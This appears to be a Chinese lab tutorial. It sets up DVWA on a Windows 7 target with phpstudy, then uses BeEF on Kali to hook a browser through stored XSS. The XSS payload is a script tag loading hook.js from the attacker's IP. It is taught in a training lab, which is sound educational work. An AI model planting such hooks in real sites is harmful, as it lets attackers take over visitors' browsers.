一 配置靶机环境
1.登录win7靶机
![](https://img-blog.csdnimg.cn/b345cf9c974946c696f40fa3472ecb2d.png)
2.访问https://www.xp.cn/,下载phpstudy软件(下载最新版的就可以),phpstudy软件可以用来进行站点搭建。
![](https://img-blog.csdnimg.cn/ac9612c5218b46d98abf7178768712b0.png)
3.解压后开始安装phpstudy
![](https://img-blog.csdnimg.cn/3b049e0c9024469eb95007fe1f77a983.png)
4.点击启动Apache服务与MySQL服务进行测试
![](https://img-blog.csdnimg.cn/cadf01a21edd4db9aa6acea2db107eea.png)
5.在浏览器访问127.0.0.1或者localhost,出现“站点创建成功”,则q安装成功
![](https://img-blog.csdnimg.cn/e8f7023cc120448fbb288632117a4264.png)
6.访问https://github.com/ethicalhack3r/DVWA,下载压缩包
![](https://img-blog.csdnimg.cn/2bf6c100bb134495b70a25e09a9d1a27.png)
7.将解压后的DVWA文件夹放到phpstudy安装目录下
8.进入DVWA文件夹,将文件config.inc.php.dist复制为一个副本,将副本修改为config.inc.php,双击从记事本里面打开。
![](https://img-blog.csdnimg.cn/186f0efaf1cf4bc284fde5a67932a9c2.png)
9.打开config.inc.php文件后,将文件中的db_user db_password,分别修改为root,root
![](https://img-blog.csdnimg.cn/448edacecf144630b7a95f251809c3a8.png)
10.保持phpstudy开启状态,在浏览器中输入网址:http://127.0.0.1/DVWA-master,进入配置安装界面,点击Setup/Reset DB。
![](https://img-blog.csdnimg.cn/de7f7d0ddbeb4255ab9dbe2493e58bc8.png)
11.第一次安装可能在方框内会出现标红,下面依次解决:
(1)打开dvwa下面的config.inc.php文件,在文件里面找到这两串代码
将这两串key输入进去
public:
6LdJJlUUAAAAAH1Q6cTpZRQ2Ah8VpyzhnffD0mBb
private:
6LdJJlUUAAAAAM2a3HrgzLczqdYp4g05EqDs-W4K
![](https://img-blog.csdnimg.cn/78ee1b1fc84b46f39ea7d0c1dc98487c.png)
12.在phpstudy的安装目录中,找到php.ini文件,打开它
![](https://img-blog.csdnimg.cn/0ae8efabd2b240fa81594572a871197f.png)
13.将allow_url_fopen和allow_url_include的值改为On
![](https://img-blog.csdnimg.cn/b18d850a62d049938f34d064daf04c99.png)
14.最后重启一下phpstudy中的Apache与mysql服务,再次访问http://127.0.0.1/DVWA-maste中的设置,你可以发现都正常了,可能会跳转到登陆页面,那就说明安装成功,输入账号和密码:DVWA的默认账号和默认密码分别是:admin 和 password
![](https://img-blog.csdnimg.cn/e607b8d3d529485582a1c6d36c88b28b.png)
BeEF安装
在kali中可使用 apt-get install beef-xss 命令来安装BeEF,
二.利用BeEF 执行 XSS 攻击案例
(1)从BeEF 安装目录中启动它(注意:新的 BeEF 启动前会强制新用户设定密码,可以在终端设立为:123456,或者可以在配置文件 “/usr/share/beef-xss/config.yaml”或"/etc/beef-xss/config.yaml"修改默认账号密码!)
cd /usr/share/beef-xss/
./beef
![](https://img-blog.csdnimg.cn/img_convert/6561a683fde14382b99ea3ad9a77cabd.png)
(2)浏览器打开http://127.0.0.1:3000/ui/panel,使用账户名和密码登录:
![](https://img-blog.csdnimg.cn/img_convert/42a3a4695dc907ff0dd9b8930ae8b5e5.png)
(3)将win7靶机中的DWVA难度调为low
![](https://img-blog.csdnimg.cn/img_convert/63e2848ed4dd952f509a297ed525fe21.png)
(4)在XSS(Stored)输入脚本命令下
Name:ceshi(自己取一个名字)
Message:<script src="http://192.xxx.xxx.xxx(自己的kaliIP地址):3000/hook.js"></script>
![](https://img-blog.csdnimg.cn/img_convert/a3f72f92cbbc3cc22a95a0992075faeb.png)
(5)点击Sign Guestbook,kali那边Beef就勾上了靶机所在的浏览器了
![](https://img-blog.csdnimg.cn/img_convert/c69bcfe4290af4c0996239aad0e0cdfc.png)